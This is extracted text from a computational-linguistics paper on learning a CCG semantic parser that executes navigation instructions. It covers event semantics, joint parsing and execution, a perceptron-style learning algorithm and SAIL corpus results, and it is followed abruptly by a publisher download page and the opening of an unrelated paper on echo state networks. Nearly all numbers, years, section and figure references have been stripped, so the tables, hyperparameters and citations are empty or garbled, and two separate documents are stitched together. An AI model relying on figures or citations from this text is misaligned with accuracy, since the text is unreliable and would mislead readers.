which we do not model. are fixed. the ability to refer to directions allows us to manipulate position sets. for example, the phrase “your left” is mapped to the logical expres- sion orient(you,left), which denotes the position set containing the position to the left of the agent. prepositions and adjectives noun phrases with modifiers, such as adjectives and prepositional phrases are 〈e,t〉-type expressions that implement set intersection with logical conjunctions. for ex- ample in figure , the phrase “blue hall” is paired with λx.hall(x)∧blue(x) with denotation {b} and the phrase “chair in the intersection” is paired with λx.chair(x) ∧ intersect(ιy.junction(y),x) with denotation {e}. intuitively, the adjective “blue” introduces the constant blue and “in the” adds a intersect. we will describe the full details of how these expressions are constructed in section . . spatial relations the semantic representation al- lows more complex reasoning over position sets and the relations between them. for example, the bi- nary relation in front of (figure g) tests if the first argument is in front of the second from the point of view of the agent. additional relations are used to model set intersection, relative direction, relative distance, and relative position by distance. . modeling instructions to model actions in the world, we adopt neo- davidsonian event semantics (davidson, ; par- sons, ), which treats events as ev-type primitive objects. such an approach allows for a compact lex- icon where adverbial modifiers introduce predicates, which are linked by a shared event argument. instructional language is characterized by heavy usage of imperatives, which we model as func- tions from events to truth values. for example, an imperative such as “move” would have the mean- ing λa.move(a), which defines a set of events that match the specified constraints. here, this set would include all events that involve moving actions. the denotation of ev-type terms is a sequence of n instances of the same action. in this way, an event defines a function ev : s → s′, where s is the start state and s′ the end state. for example, the imperatives are 〈ev,t〉-type, much like 〈e,t〉-type wh- interrogatives. both define sets, the former includes actions to execute, the later defines answers to a question. denotation of λa.move(a) is the set of move action sequences {〈move , . . . , moven〉 : n ≥ }. al- though performing actions often require performing additional ones (e.g., the agent might have to turn before being able to move), we treat such actions as implicit (section . ), and don’t model them explic- itly within the logical form. predicates such as move (seen above) and turn are introduced by verbs. events can also be modified by adverbials, which are intersective, much like prepositional phrases. for example in the imperative, logical form (lf) pair: imp.: move from the sofa to the chair lf: λa.move(a) ∧ to(a,ιx.chair(x)) ∧ from(a,ιy.sofa(y)) each adverbial phrase provides a constraint, and changing their order will not change the lf. . parsing instructional language with ccg to compose logical expressions from sentences we use ccg, as described in section . figures and present a sample of lexical entries and how they are combined, as we will describe in this section. the basic syntactic categories are n (noun), np (noun phrase), s (sentence), pp (prepositional phrase), ap (adverbial phrase), adj (adjective) and c (a special category for coordinators). type raising to compactly model syntactic vari- ations, we follow carpenter ( ), who argues for polymorphic typing. we include the more simple, or lower type, entry in the lexicon and introduce type- raising rules to reconstruct the other when necessary at parse time. we use four rules: pp : g → n\n : λf.λx.f(x) ∧g(x) adj : g → n/n : λf.λx.f(x) ∧g(x) ap : g → s\s : λf.λa.f(a) ∧g(a) ap : g → s/s : λf.λa.f(a) ∧g(a) where the first three are for prepositional, adjectival and adverbial modifications, and the fourth models the fact that adverbials are often topicalized. fig- ures and show parses that use type-raising rules. indefinites as discussed in section . , we use a new syntactic analysis for indefinites, follow- using type-raising rules can be particularly useful when learning from sparse data. for example, it will no longer be necessary to learn three lexical entries for each adverbial phrase (with syntax ap , s\s, and s/s). chair in the corner n pp/np np/n n λx.chair(x) λx.λy.intersect(x,y) λf.ax.f(x) λx.corner(x) > np ιx.corner(x) > pp λy.intersect(ιx.corner(x),y) n\n λf.λy.f(y) ∧ intersect(ιx.chair(x),y) < n λy.chair(y) ∧ intersect(ιx.chair(x),y) figure : a ccg parse with a prepositional phrase. ing steedman ( ). previous approaches would build parses such as with a lamp pp/np pp\(pp/np)/n n λx.λy.intersect(x,y) λf.λg.λy.∃x.g(x,y) ∧ f(x) λx.lamp(x) > pp\(pp/np) λg.λy.∃x.g(x,y) ∧ lamp(x) < pp λy.∃x.intersect(x,y) ∧ lamp(x) where “a” has the relatively complex syntactic cate- gory pp\(pp/np)/n and where similar entries would be needed to quantify over different types of verbs (e.g., s\(s/np)/n) and adverbials (e.g., ap\(ap/np)/n). instead, we include a single lexical entry a ` np/n : λf.ax.f(x) which can be used to construct the correct meaning in all cases. joint parsing and execution our inference includes an execution component and a parser. the parser maps sentences to logical forms, and incorporates the grounded execution model. we first discuss how to execute logical forms, and then describe the joint model for execution and parsing. . executing logical expressions dynamic models in spatial environments, such as the ones in our task, the agent’s ability to observe the world depends on its current state. taking this aspect of spatial environments into account is challenging, but crucial for correct evaluation. to represent the agent’s point of view, for each state s ∈ s, as defined in section , let ms be the state-dependent logical model. a model m consists of a domain dm,t of objects for each type t and an interpretation function im,t : ot → dm,t , where ot is the set of t -type constants. im,t maps logical symbols to t -type objects, for exam- ple, it will map you to the agent’s position. we have domains for position sets, actions and so on. fi- nally, let vt be the set of variables of type t , and facing the lamp go until you reach a chair ap/np np/n n s ap/s np s\np/np np/n n λx.λa.pre(a, λf.ιx.f(x) λx.lamp(x) λa.move(a) λs.λa.post(a,s) you λx.λy.intersect(x,y) λf.ax.f(x) λx.chair(x) front(you,x)) > > np np ιx.lamp(x) ax.chair(x) > > ap s\np λa.pre(a,front(you,ιx.lamp(x))) λy.intersect(ax.chair(x),y) < s/s s λf.λa.f(a) ∧ pre(a,front(you,ιx.lamp(x))) intersect(ax.chair(x),you) > ap λa.post(a,intersect(ax.chair(x),you)) s\s λf.λa.f(a) ∧ post(a,intersect(ax.chair(x),you)) < s λa.move(a) ∧ post(a,intersect(ax.chair(x),you)) > s λa.move(a) ∧ post(a,intersect(ax.chair(x),you)) ∧ pre(a,front(you,ιx.lamp(x))) figure : a ccg parse showing adverbial phrases and topicalization. at : vt → ⋃ s∈s dms,t be the assignment func- tion, which maps variables to domain objects. for each model ms the domain dms,ev is a set of action sequences {〈a , ...,an〉 : n ≥ }. each ~a defines a sequences of states si, as defined in sec- tion . , and associated models msi. the key chal- lenge for execution is that modifiers of the event will need to be evaluated under different models from this sequence. for example, consider the sentence in figure . to correctly execute, the pre literal, in- troduced by the “facing” phrase, it must be evaluated in the model ms for the initial state s . similarly, the literal including post requires the final model msn+ . such state dependent predicates, including pre and post, are called stateful. the list of stateful predicates is pre-defined and includes event modi- fiers, as well the ι quantifier, which is evaluated un- der ms , since definite determiners are assumed to name objects visible from the start position. in gen- eral, a logical expression is traversed depth first and the model is updated every time a stateful predicate is reached. for example, the two e-type you con- stants in figure will be evaluated under different models: the one within the pre literal under ms , and the one inside the post literal under msn+ . evaluation given a logical expression l, we can compute the interpretation ims ,t (l) by recursively mapping each subexpression to an entry on the ap- propriate model m. to reflect the changing state of the agent during evaluation, we define the function update(~a,pred). given an action sequence ~a and a stateful predi- cate pred, update returns a model ms, where s is the state under which the literal containing pred should be interpreted, either the initial state or one visited while executing ~a. for example, given the predicate post and the action sequence 〈a , . . . ,an〉, update(〈a , . . . ,an〉,post) = msn+ , where sn+ the state of the agent following action an. by con- vention, we place the event variable as the first argu- ment in literals that include one. given a t -type logical expression l and a start- ing state s , we compute its interpretation ims ,t (l) recursively, following these three base cases: • if l is a λ operator of type 〈t ,t 〉 binding vari- able v and body b, ims,t (l) is a set of pairs from dt ×dt , where dt ,dt ∈ ms. for each object o ∈ dt , we create a pair (o,i) where i is the interpretation ims,t (b) com- puted under a variable assignment function ex- tended to map at (v) = o. • if l is a literal c(c , . . . ,cn) with n argu- ments where c has type p and each ci has type pi, ims,t (l) is computed by first in- terpreting the predicate c to the function f = ims,t (c). in most cases, ims,t (l) = f(ims,p (c ), . . . ,ims,pn(cn)). however, if c is a stateful predicate, such as pre or post, we instead first retrieve the appropriate new model ms′ = update(ims,p (c ),c), where c is the event argument and ims,p (c ) is its interpre- tation. then, the final results is ims,t (l) = f(ims′,p (c ), . . . ,ims′,pn(cn)). • if l is a t -type constant or variable, ims,t (l). the worst case complexity of the process is ex- ponential in the number of bound variables. al- though in practice we observed tractable evaluation in the majority of development cases we considered, a more comprehensive and tractable evaluation pro- cedure is an issue that we leave for future work. implicit actions instructional language rarely specifies every action required for execution, see macmahon ( ) for a detailed discussion in the maps domain. for example, the sentence in fig- ure can be said even if the agent is not facing a blue hallway, with the clear implicit request that it should turn to face such a hallway before moving. to allow our agent to perform implicit actions, we extend the domain of ev-type variables by allowing the agent to prefix up to ki action sequences before each explicit event. for example, in the agent’s po- sition in figure (set c), the set of possible events includes 〈movei, movei, righti, move〉, which contains two implicit sequences (marked by i). resolving action ambiguity logical forms of- ten fail to determine a unique action sequences, due to instruction ambiguity. for example, con- sider the instruction “go forward” and the agent state as specified in figure (set c). the instruction, which maps to λa.move(a) ∧ forward(a), evalu- ates to the set containing 〈move〉, 〈move, move〉 and 〈move, move, move〉, as well as five other se- quences that have implicit prefixes followed by ex- plicit move actions. to resolve such ambiguity, we prefer shorter actions without implicit actions. in the example above, we will select 〈move〉, which includes a single action and no implicit actions. . joint inference we incorporate the execution procedure described above with a linear weighted ccg parser, as de- scribed in section , to create a joint model of pars- ing and execution. specifically, we execute logi- cal forms in the current state and observe the result of their execution. for example, the word “chair” can be used to refer to different types of objects, in- cluding chairs, sofas, and barstools, in the maps do- mains. our ccg grammar would include a lexical item for each meaning, but execution might fail de- pending on the presence of objects in the world, in- fluencing the final parse output. similarly, allowing implicit actions provides robustness when resolv- ing these and other ambiguities. for example, an instruction with the precondition phrase “from the chair” might require additional actions to reach the position with the named object. to allow such joint reasoning we define an ex- ecution e to include a parse tree ey and trace e~a, and define our feature function to be Φ(xi,si,e), where xi is an instruction and si is the start state. this approach allows joint dependencies: the state of the world influences how the agent interprets words, phrases and even complete sentences, while language understanding determines actions. finally, to execute sequences of instructions, we execute each starting from the end state of the previ- ous one, using a beam of size ks. learning figure presents the complete learning algorithm. our approach is online, considering each example in turn and performing two steps: expanding the lex- icon and updating parameters. the algorithm as- sumes access to a training set {(xi,si,vi) : i = . . .n}, where each example includes an instruction xi, starting state si and a validation function vi, as defined in section . in addition the algorithm takes a seed lexicon Λ . the output is a joint model, that includes a lexicon Λ and parameters θ. coarse lexical generation to generate po- tential lexical entries we use the function genlex(x,s,v; Λ,θ), where x is an in- struction, s is a state and v is a validation function. Λ is the current lexicon and θ is a parameter vector. in genlex we use coarse logical constants, as described below, to efficiently prune the set of potential lexical entries. this set is then pruned further using more precise inference in step . to compute genlex, we initially generate a large set of lexical entries and then prune most of them. the full set is generated by taking the cross product of a set of templates, computed by factor- ing out all templates in the seed lexicon Λ , and all logical constants. for example, if Λ has a lexical item with the category ap/np : λx.λa.to(a,x) we would create entries w ` ap/np : λx.λa.p(a,x) for every phrase w in x and all constants p with the same type as to. in our development work, this approach often generated nearly k entries per sentence. to ease generalizing previous work (kwiatkowski et al., ), we allow templates that abstract subsets of the constants in a lex- ical item. for example, the seed entry facing ` ap/np : λx.λa.pre(a,front(you,x)) would create templates. inputs: training set {(xi,si,vi) : i = . . .n} where xi is a sentence, si is a state and vi is a validation function, as de- scribed in section . initial lexicon Λ . number of iterations t . margin γ. beam size k for lexicon generation. definitions: let an execution e include a parse tree ey and a trace e~a. gen(x,s; Λ) is the set of all possible execu- tions for the instruction x and state s, given the lexicon Λ. lex(y) is the set of lexical entries used in the parse tree y. let Φi(e) be shorthand for the feature function Φ(xi,si,e) defined in section . . define ∆i(e,e′) = |Φi(e)−Φi(e′)| . genlex(x,s,v; λ,θ) takes as input an instruction x, state s, validation function v, lexicon λ and model param- eters θ, and returns a set of lexical entries, as defined in sec- tion . finally, for a set of executions e let maxvi(e; θ) be {e|∀e′ ∈ e,〈θ, Φi(e′)〉≤ 〈θ, Φi(e)〉∧vi(e~a) = }, the set of highest scoring valid executions. algorithm: initialize θ using Λ , Λ ← Λ for t = . . .t,i = . . .n : step : (lexical generation) a. set λg ← genlex(xi,si,vi; Λ,θ), λ ← Λ ∪λg b. let e be the k highest scoring executions from gen(xi,si; λ) which use at most one entry from λg c. select lexical entries from the highest scoring valid parses: λi ← ⋃ e∈maxvi(e;θ) lex(e y) d. update lexicon: Λ ← Λ ∪λi step : (update parameters) a. set gi ← maxvi(gen(xi,si; Λ); θ) and bi ←{e|e ∈ gen(xi,si; Λ) ∧vi(e~a) = } b. construct sets of margin violating good and bad parses: ri ←{g|g ∈ gi ∧ ∃b ∈ bi s.t. 〈θ, Φi(g) − Φi(b)〉 < γ∆i(g,b)} ei ←{b|b ∈ bi ∧ ∃g ∈ gi s.t. 〈θ, Φi(g) − Φi(b)〉 < γ∆i(g,b)} c. apply the additive update: θ ← θ + |ri| ∑ r∈ri Φi(r) − |ei| ∑ e∈ei Φi(e) output: parameters θ and lexicon Λ figure : the learning algorithm. the cost of parsing at this scale, we developed a coarse-to-fine two-pass parsing approach that lim- its the number of new entries considered. the algo- rithm first parses with coarse lexical entries that ab- stract the identities of the logical constants in their logical forms, thereby greatly reducing the search space. it then uses the highest scoring coarse parses to constrain the lexical entries for a final, fine parse. formally, we construct the coarse lexicon λa by replacing all constants of the same type with a single newly created, temporary constant. we then parse to create a set of trees a, such that each y ∈ a . is a parse for sentence x, given the world state s with the combined lexicon Λ ∪λa, . scored higher than ey by at least a margin of δl, where ey is the tree of e, the highest scoring execution of x, at position s under the current model, s.t. v(e~a) = , . contains at most one entry from λa. finally, from each entry l ∈ {l|l ∈ λa ∧ l ∈ y ∧ y ∈ a}, we create multiple lexical entries by replacing all temporary constants with all possible appropriately typed constants from the original set. genlex returns all these lexical entries, which will be used to form our final fine-level analysis. step : lexical induction to expand our model’s lexicon, we use genlex to generate candidate lexical entries and then further refine this set by pars- ing with the current model. step (a) in figure uses genlex to create a temporary set of po- tential lexical entries λg. steps (b-d) select a small subset of these lexical entries to add to the current lexicon Λ: we find the k-best executions under the model, which use at most one entry from λg, find the entries used in the best valid executions and add them to the current lexicon. step : parameter update we use a variant of a loss-driven perceptron (singh-miller & collins, ; artzi & zettlemoyer, ) for parameter up- dates. however, instead of taking advantage of a loss function we use a validation signal. in step (a) we collect the highest scoring valid parses and all in- valid parses. then, in step (b) we construct the set ri of valid analyses and ei of invalid ones, such that their model scores are not separated by a mar- gin δ scaled by the number of wrong features (taskar et al., ). finally, step (f) applies the update. discussion the algorithm uses the validation sig- nal to drive both lexical induction and parameter updates. unlike previous work (zettlemoyer & collins, , ; artzi & zettlemoyer, ), we have no access to a set of logical constants, either through the the labeled logical form or the weak supervision signal, to guide the genlex procedure. therefore, to avoid over-generating lex- ical entries, thereby making parsing and learning intractable, we leverage typing for coarse parsing to prune the generated set. by allowing a single oracle sail # of instruction sequences # of instruction sequences with implicit actions total # of sentences avg. sentences per sequence . . avg. tokens per sentence . . vocabulary size table : corpora statistics (lower-cased data). new entry per parse, we create a conservative, cas- cading effect, whereas a lexical entry that is intro- duced opens the way for many other sentence to be parsed and introduce new lexical entries. further- more, grounded features improve parse selection, thereby generating higher quality lexical entries. experimental setup data for evaluation, we use the navigation task from macmahon et al. ( ), which includes three environments and the sail corpus of instructions and follower traces. chen and mooney ( ) seg- mented the data, aligned traces to instructions, and merged traces created by different subjects. the corpus includes raw sentences, without any form of linguistic annotation. the original collection pro- cess (macmahon et al., ) created many unin- terpretable instructions and incorrect traces. to fo- cus on the learning and interpretation tasks, we also created a new dataset that includes only accurate in- structions labeled with a single, correct execution trace. from this oracle corpus, we randomly sam- pled instruction sequences ( sentences) for evaluation, leaving ( sentences) for train- ing. this simple effort will allow us to measure the effects of noise on the learning approach and pro- vides a resource for building more accurate algo- rithms. table compares the two sets. features and parser following zettlemoyer and collins ( ), we use a cky parser with a beam of k. to boost recall, we adopt a two-pass strategy, which allows for word skipping if the initial parse fails. we use features that indicate usage of lexical entries, templates, lexemes and type-raising rules, as described in section . , and repetitions in logical coordinations. finally, during joint parsing, we con- sider only parses executable at si as complete. seed lexicon to construct our seed lexicon we la- beled instruction sequences with lexical en- single sentence sequence final state validation complete system . ( . ) . ( . ) no implicit actions . ( . ) . ( . ) no joint execution . ( . ) . ( . ) trace validation complete system . ( . ) . ( . ) no implicit actions . ( . ) . ( . ) no joint execution . ( . ) . ( . ) table : cross-validation development accuracy and standard deviation on the oracle corpus. tries. the sequences were randomly selected from the training set, so as to include two sequences for each participant in the original experiment. fig- ures and include a sample of our seed lexicon. initialization and parameters we set the weight of each template indicator feature to the number of times it is used in the seed lexicon and each repeti- tion feature to - . learning parameters were tuned using cross-validation on the training set: the mar- gin δ is set to , the genlex margin δl is set to , we use iterations ( for experiments on sail) and take the top parses during lexical genera- tion (step , figure ). for parameter update (step , figure ) we use a parser with a beam of . genlex generates lexical entries for token se- quences up to length . ks, the instruction sequence execution beam, is set to . finally, ki is set to , allowing up to two implicit action sequences per explicit one. evaluation metrics to evaluate single instruc- tions x, we compare the agent’s end state to a labeled state s′, as described in section . we use a similar method to evaluate the execution of instruction se- quences ~x, but disregard the orientation, since end goals in macmahon et al. ( ) are defined with- out orientation. when evaluating logical forms we measure exact match accuracy. results we repeated each experiment five times, shuffling the training set between runs. for the development cross-validation runs, we also shuffled the folds. as our learning approach is online, this allows us to ac- count for performance variations arising from train- ing set ordering. we report mean accuracy and stan- dard deviation across all runs (and all folds). single sentence sequence chen and mooney ( ) . . chen ( ) . . + additional data . . kim and mooney ( ) . . trace validation . ( . ) . ( . ) final state validation . ( . ) . ( . ) table : cross-validation accuracy and standard de- viation for the sail corpus. table shows accuracy for -fold cross- validation on the oracle training data. we first varied the validation signal by providing the complete ac- tion sequence or the final state only, as described in section . although the final state signal is weaker, the results are similar. the relatively large difference between single sentence and sequence performance is due to ( ) cascading errors in the more difficult task of sequential execution, and ( ) corpus repe- titions, where simple sentences are common (e.g., “turn left”). next, we disabled the system’s ability to introduce implicit actions, which was especially harmful to the full sequence performance. finally, ablating the joint execution decreases performance, showing the benefit of the joint model. table lists cross validation results on the sail corpus. to compare to previous work (chen & mooney, ), we report cross-validation results over the three maps. the approach was able to cor- rectly execute % more sequences then the previ- ous state of the art (kim & mooney, ). we also outperform the results of chen ( ), which used % more training data. using the weaker validation signal creates a marginal decrease in per- formance. however, we still outperform all previ- ous work, despite using weaker supervision. inter- estingly, these increases were achieved with a rel- atively simple executor, while previous work used marco (macmahon et al., ), which supports sophisticated recovery strategies. finally, we evaluate our approach on the held out test set for the oracle corpus (table ). in contrast to experiments on the chen and mooney ( ) cor- pus, we use a held out set for evaluation. due to this discrepancy, all development was done on the train- ing set only. the increase in accuracy over learning with the original corpus demonstrates the significant impact of noise on our performance. in addition to this additional training data isn’t publicly available. validation single sentence sequence lf final state . ( . ) . ( . ) ( . ) trace . ( . ) . ( . ) . ( . ) table : oracle corpus test accuracy and standard deviation results. execution results, we also report exact match logi- cal form (lf) accuracy results. for this purpose, we annotated instruction sequences ( sentences) with logical forms. the gap between execution and lf accuracy can be attributed to the complexity of the linguistic representation and redundancy in in- structions. these results provide a new baseline for studying learning from cleaner supervision. discussion we showed how to do grounded learning of a ccg semantic parser that includes a joint model of mean- ing and context for executing natural language in- structions. the joint nature allows situated cues to directly influence parsing and also enables algo- rithms that learn while executing instructions. this style of algorithm, especially when using the weaker end state validation, is closely related to re- inforcement learning approaches (branavan et al., , ). however, we differ on optimization and objective function, where we aim for minimal loss. we expect many rl techniques to be useful to scale to more complex environments, including sampling actions and using an exploration strategy. we also designed a semantic representation to closely match the linguistic structure of instructional language, combining ideas from many semantic theories, including, for example, neo-davidsonian events (parsons, ). this approach allowed us to learn a compact and executable grammar that gen- eralized well. we expect, in future work, that such modeling can be reused for more general language. acknowledgments the research was supported in part by darpa un- der the deft program through the afrl (fa - - - ) and the cssg (n ap ), the aro (w nf- - - ), and the nsf (iis- ). the authors thank tom kwiatkowski, nicholas fitzgerald and alan ritter for helpful discussions, david chen for providing the evaluation corpus, and the anonymous reviewers for helpful comments. references artzi, y., & zettlemoyer, l. ( ). bootstrapping se- mantic parsers from conversations. in proceed- ings of the conference on empirical methods in natural language processing. barwise, j., & cooper, r. ( ). generalized quanti- fiers and natural language. linguistics and phi- losophy, ( ), – . branavan, s., chen, h., zettlemoyer, l., & barzilay, r. ( ). reinforcement learning for mapping in- structions to actions. in proceedings of the joint conference of the association for computational linguistics and the international joint conference on natural language processing. branavan, s., zettlemoyer, l., & barzilay, r. ( ). reading between the lines: learning to map high- level instructions to commands. in proceedings of the conference of the association for computa- tional linguistics. bugmann, g., klein, e., lauria, s., & kyriacou, t. ( ). corpus-based robotics: a route instruc- tion example. in proceedings of intelligent au- tonomous systems. carpenter, b. ( ). type-logical semantics. the mit press. chen, d. l. ( ). fast online lexicon learning for grounded language acquisition. in proceedings of the annual meeting of the association for com- putational linguistics. chen, d., kim, j., & mooney, r. ( ). training a mul- tilingual sportscaster: using perceptual context to learn language. journal of artificial intelligence research, ( ), – . chen, d., & mooney, r. ( ). learning to interpret natural language navigation instructions from observations. in proceedings of the national con- ference on artificial intelligence. clark, s., & curran, j. ( ). wide-coverage efficient statistical parsing with ccg and log-linear mod- els. computational linguistics, ( ), – . clarke, j., goldwasser, d., chang, m., & roth, d. ( ). driving semantic parsing from the world’s response. in proceedings of the confer- ence on computational natural language learn- ing. collins, m. ( ). parameter estimation for statis- tical parsing models: theory and practice of distribution-free methods. in new developments in parsing technology. davidson, d. ( ). the logical form of action sen- tences. essays on actions and events, – . di eugenio, b., & white, m. ( ). on the interpre- tation of natural language instructions. in pro- ceedings of the conference of the association of computational linguistics. dzifcak, j., scheutz, m., baral, c., & schermerhorn, p. ( ). what to do and how to do it: trans- lating natural language directives into temporal and dynamic logic representation for goal man- agement and action execution. in proceedings of the ieee international conference on robotics and automation. goldwasser, d., reichart, r., clarke, j., & roth, d. ( ). confidence driven unsupervised seman- tic parsing. in proceedings of the association of computational linguistics. goldwasser, d., & roth, d. ( ). learning from nat- ural instructions. in proceedings of the interna- tional joint conference on artificial intelligence. heim, i., & kratzer, a. ( ). semantics in generative grammar. blackwell oxford. kate, r., & mooney, r. ( ). using string-kernels for learning semantic parsers. in proceedings of the conference of the association for computational linguistics. kim, j., & mooney, r. j. ( ). unsupervised pcfg induction for grounded language learning with highly ambiguous supervision. in proceedings of the conference on empirical methods in natu- ral language processing. kollar, t., tellex, s., roy, d., & roy, n. ( ). toward understanding natural language directions. in proceedings of the acm/ieee international con- ference on human-robot interaction. krishnamurthy, j., & mitchell, t. ( ). weakly super- vised training of semantic parsers. in proceed- ings of the joint conference on empirical meth- ods in natural language processing and compu- tational natural language learning. kwiatkowski, t., goldwater, s., zettlemoyer, l., & steedman, m. ( ). a probabilistic model of syntactic and semantic acquisition from child- directed utterances and their meanings. proceed- ings of the conference of the european chapter of the association of computational linguistics. kwiatkowski, t., zettlemoyer, l., goldwater, s., & steedman, m. ( ). inducing probabilistic ccg grammars from logical form with higher-order unification. in proceedings of the conference on empirical methods in natural language process- ing. kwiatkowski, t., zettlemoyer, l., goldwater, s., & steedman, m. ( ). lexical generalization in ccg grammar induction for semantic parsing. in proceedings of the conference on empirical methods in natural language processing. lafferty, j., mccallum, a., & pereira, f. ( ). con- ditional random fields: probabilistic models for segmenting and labeling sequence data. in pro- ceedings of the international conference on ma- chine learning. lewis, d. ( ). general semantics. synthese, ( ), – . liang, p., jordan, m., & klein, d. ( ). learning se- mantic correspondences with less supervision. in proceedings of the joint conference of the asso- ciation for computational linguistics the interna- tional joint conference on natural language pro- cessing. liang, p., jordan, m., & klein, d. ( ). learning dependency-based compositional semantics. in proceedings of the conference of the association for computational linguistics. macmahon, m. ( ). following natural language route instructions. ph.d. thesis, university of texas at austin. macmahon, m., stankiewics, b., & kuipers, b. ( ). walk the talk: connecting language, knowl- edge, action in route instructions. in proceed- ings of the national conference on artificial intel- ligence. matuszek, c., fitzgerald, n., zettlemoyer, l., bo, l., & fox, d. ( ). a joint model of language and perception for grounded attribute learning. pro- ceedings of the international conference on ma- chine learning. matuszek, c., fox, d., & koscher, k. ( ). follow- ing directions using statistical machine translation. in proceedings of the international conference on human-robot interaction. matuszek, c., herbst, e., zettlemoyer, l. s., & fox, d. ( ). learning to parse natural language com- mands to a robot control system. in proceedings of the international symposium on experimental robotics. montague, r. ( ). the proper treatment of quantifi- cation in ordinary english. approaches to natural language, , – . muresan, s. ( ). learning for deep language under- standing. in proceedings of the international joint conference on artificial intelligence. parsons, t. ( ). events in the semantics of english. the mit press. singh-miller, n., & collins, m. ( ). trigger-based language modeling using a loss-sensitive percep- tron algorithm. in ieee international conference on acoustics, speech and signal processing. steedman, m. ( ). surface structure and interpreta- tion. the mit press. steedman, m. ( ). the syntactic process. the mit press. steedman, m. ( ). taking scope. the mit press. taskar, b., guestrin, c., & koller, d. ( ). max- margin markov networks. in proceedings of the conference on neural information processing systems. taskar, b., klein, d., collins, m., koller, d., & manning, c. ( ). max-margin parsing. in proceedings of the conference on empirical methods in natural language processing. tellex, s., kollar, t., dickerson, s., walter, m., banerjee, a., teller, s., & roy, n. ( ). understanding natural language commands for robotic naviga- tion and mobile manipulation. in proceedings of the national conference on artificial intelligence. vogel, a., & jurafsky, d. ( ). learning to follow nav- igational directions. in proceedings of the con- ference of the association for computational lin- guistics. webber, b., badler, n., di eugenio, b., geib, c., lev- ison, l., & moore, m. ( ). instructions, in- tentions and expectations. artificial intelligence, ( ), – . wei, y., brunskill, e., kollar, t., & roy, n. ( ). where to go: interpreting natural directions using global inference. in proceedings of the ieee international conference on robotics and automation. winograd, t. ( ). understanding natural language. cognitive psychology, ( ), – . wong, y., & mooney, r. ( ). learning synchronous grammars for semantic parsing with lambda cal- culus. in proceedings of the conference of the as- sociation for computational linguistics. zettlemoyer, l., & collins, m. ( ). learning to map sentences to logical form: structured classification with probabilistic categorial grammars. in pro- ceedings of the conference on uncertainty in ar- tificial intelligence. zettlemoyer, l., & collins, m. ( ). online learning of relaxed ccg grammars for parsing to logical form. in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learn- ing. please scroll down for article this article was downloaded by: [universiteit van amsterdam] on: march access details: access details: [subscription number ] publisher taylor & francis informa ltd registered in england and wales registered number: registered office: mortimer house, - mortimer street, london w t jh, uk connection science publication details, including instructions for authors and subscription information: http://www.informaworld.com/smpp/title~content=t sentence-processing in echo state networks: a qualitative analysis by finite state machine extraction stefan l. frank a;henrik jacobsson b a institute for logic, language and computation, university of amsterdam, amsterdam, ge, the netherlands b german research center for artificial intelligence (dfki), saarbrücken, germany first published on: march to cite this article frank, stefan l. andjacobsson, henrik( ) 'sentence-processing in echo state networks: a qualitative analysis by finite state machine extraction', connection science,, first published on: march (ifirst) to link to this article: doi: . / url: http://dx.doi.org/ . / full terms and conditions of use: http://www.informaworld.com/terms-and-conditions-of-access.pdf this article may be used for research, teaching and private study purposes. any substantial or systematic reproduction, re-distribution, re-selling, loan or sub-licensing, systematic supply or distribution in any form to anyone is expressly forbidden. the publisher does not give any warranty express or implied or make any representation that the contents will be complete or accurate or up to date. the accuracy of any instructions, formulae and drug doses should be independently verified with primary sources. the publisher shall not be liable for any loss, actions, claims, proceedings, demand or costs or damages whatsoever or howsoever caused arising directly or indirectly in connection with or arising out of the use of this material. http://www.informaworld.com/smpp/title~content=t http://dx.doi.org/ . / http://www.informaworld.com/terms-and-conditions-of-access.pdf connection science , – , ifirst sentence-processing in echo state networks: a qualitative analysis by finite state machine extraction stefan l. franka * and henrik jacobssonb† institute for logic, language and computation, university of amsterdam, p.o. box , ge, amsterdam, the netherlands; bgerman research center for artificial intelligence (dfki), saarbrücken, germany (received july ; final version received august ) it has been shown that the ability of echo state networks (esns) to generalise in a sentence-processing task can be increased by adjusting their input connection weights to the training data. we present a qualitative analysis of the effect of such weight adjustment on an esn that is trained to perform the next-word prediction task. our analysis makes use of cryssmex, an algorithm for extracting finite state machines (fsms) from the data about the inputs, internal states, and outputs of recurrent neural net- works that process symbol sequences. we find that the esn with adjusted input weights yields a concise and comprehensible fsm. in contrast, the standard esn, which shows poor generalisation, results in a massive and complex fsm. the extracted fsms show how the two networks differ behaviourally. more- over, poor generalisation is shown to correspond to a highly fragmented quantisation of the network’s state space. such findings indicate that cryssmex can be a useful tool for analysing esn sentence processing. keywords: echo state networks; sentence processing; rule extraction; finite state machines . introduction echo state networks (esns; jaeger , ) have recently gained popularity as a recurrent neural network (rnn) model for time-series processing. the great advantage of esns over the more traditional recurrent networks, such as the simple recurrent network (srn; elman ), is that the weights of their input and recurrent connections remain fixed at their initial random values. only the output connection weights are trained, which can be done very efficiently by linear regression, without the need for any iterative gradient-descent method (such as the well-known backpropagation algorithm) for finding proper weights. although esns have been shown to be useful for several applications, attempts to use them for modelling sentence processing in the field of cognitive science have resulted in mixed outcomes. whereas one experiment (tong, bickett, christiansen, and cottrell ) showed esns to perform *corresponding author. email: s.l.frank@uva.nl †present address: google, zurich, switzerland (since october ). issn - print/issn - online © taylor & francis doi: . / http://www.informaworld.com d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson at least as well as srns in a next-word prediction task, others (čerňanský and tiňo, ; frank a) have found esns to generalise relatively poorly. one way of increasing an esn’s ability to generalise is by adding a hidden layer in-between the recurrent and output layers (frank a, b). unfortunately, this also adds another set of connection weights to train, doing away with network’s efficient trainability. alternatively, esn generalisation can be improved by adjusting the input connection weights to the training input. as shown by čerňanský, makula, and beňušková ( ) and frank and čerňanský ( ), this can be done efficiently by one-shot, unsupervised learning. the resulting network can then be trained on the target output just like any esn, but with greatly increased ability to generalise. in this paper, we analyse the difference between two types of networks: the standard esn with random input weights and the alternative network with adjusted input weights (as mentioned above). following frank and čerňanský ( ), we call the latter model esn+. both networks are trained on the next-word prediction task in sentence processing. comparisons between the network’s performance on sentences that differ markedly from the training sentences, reported by frank and čerňanský, showed that esn+ generalises much better than does esn. here, we extend this quantitative comparison with a qualitative analysis of networks’ behaviour and of the structure of their state spaces. this is done by applying the cryssmex algorithm (jacobsson a) for extracting finite state machines (fsms) from network’s input symbols, recurrent-layer states, and output symbols. in this way, the difference between esn and esn+ becomes apparent not only from their performance levels, but also from the extracted fsms, which allows for a more detailed look into the behaviour of the networks. moreover, the quantisation of the networks’ state spaces into fsm states, as computed by cryssmex, provides insight into the underlying cause of the networks’ divergent abilities to generalise. the next section 